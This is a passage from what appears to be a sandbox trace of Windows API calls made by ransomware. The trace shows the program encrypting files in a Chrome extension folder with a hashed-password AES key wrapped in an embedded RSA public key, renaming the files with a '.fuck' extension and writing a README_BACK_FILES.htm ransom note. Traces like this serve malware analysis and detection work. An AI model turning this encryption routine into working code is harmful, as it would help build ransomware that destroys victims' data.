lpSystemTimeAsFileTime=0x2b9cff4) [0258.645] GetLastError () returned 0x0 [0258.645] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html")) returned 0x20 [0258.645] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html", dwFileAttributes=0x80) returned 1 [0258.645] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.646] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.646] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.gsg", dwFileAttributes=0x2) returned 1 [0258.647] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7af18) returned 1 [0258.648] CryptCreateHash (in: hProv=0x2e7af18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0258.648] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.648] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.648] CryptDeriveKey (in: hProv=0x2e7af18, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7c880) returned 1 [0258.648] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.648] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0258.648] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e7bf08) returned 1 [0258.649] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7bf08, dwCertEncodingType=0x1, pInfo=0x2e26bd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26c00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26c08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7c840) returned 1 [0258.649] CryptEncrypt (in: hKey=0x2e7c840, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0258.649] CryptEncrypt (in: hKey=0x2e7c840, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7b0b0*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e7b0b0*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0258.649] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e7b0b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e7b0b0*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0258.650] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x32a, lpOverlapped=0x0) returned 1 [0258.656] CryptEncrypt (in: hKey=0x2e7c880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x32a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x330) returned 1 [0258.656] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x330, lpOverlapped=0x0) returned 1 [0258.657] CloseHandle (hObject=0x5d60) returned 1 [0258.657] CloseHandle (hObject=0x5d50) returned 1 [0258.658] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html"), bFailIfExists=0) returned 1 [0258.660] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html", dwFileAttributes=0x0) returned 1 [0258.660] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.gsg")) returned 1 [0258.661] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.fuck")) returned 1 [0258.662] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0258.662] CryptDestroyKey (hKey=0x2e7c880) returned 1 [0258.662] CryptReleaseContext (hProv=0x2e7af18, dwFlags=0x0) returned 1 [0258.662] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0258.662] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0258.662] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\readme_back_files.htm")) returned 0xffffffff [0258.662] AreFileApisANSI () returned 1 [0258.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 150 [0258.662] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0258.663] GetFileType (hFile=0x5d64) returned 0x1 [0258.663] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0258.664] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0258.664] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7fd40 [0258.671] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.671] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.671] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0258.671] GetLastError () returned 0x0 [0258.671] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif")) returned 0x20 [0258.671] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif", dwFileAttributes=0x80) returned 1 [0258.672] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.672] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.673] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.gsg", dwFileAttributes=0x2) returned 1 [0258.673] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7b028) returned 1 [0258.675] CryptCreateHash (in: hProv=0x2e7b028, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0258.675] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.675] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.675] CryptDeriveKey (in: hProv=0x2e7b028, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7c380) returned 1 [0258.675] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.675] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0258.675] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e7b930) returned 1 [0258.676] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7b930, dwCertEncodingType=0x1, pInfo=0x2e26fe0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27010*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27018*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7c800) returned 1 [0258.676] CryptEncrypt (in: hKey=0x2e7c800, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0258.676] CryptEncrypt (in: hKey=0x2e7c800, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7b2d0*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e7b2d0*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0258.676] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e7b2d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e7b2d0*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0258.677] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.683] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.684] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.698] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.699] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.699] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.699] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.699] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.699] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.699] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.699] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.699] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.699] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.699] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.699] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.700] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.700] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.700] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.700] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.700] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.700] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.700] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.700] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.700] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.700] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.700] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.700] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.700] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.700] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.700] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.700] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.701] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.701] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.701] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.701] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.701] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.701] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.701] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.701] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 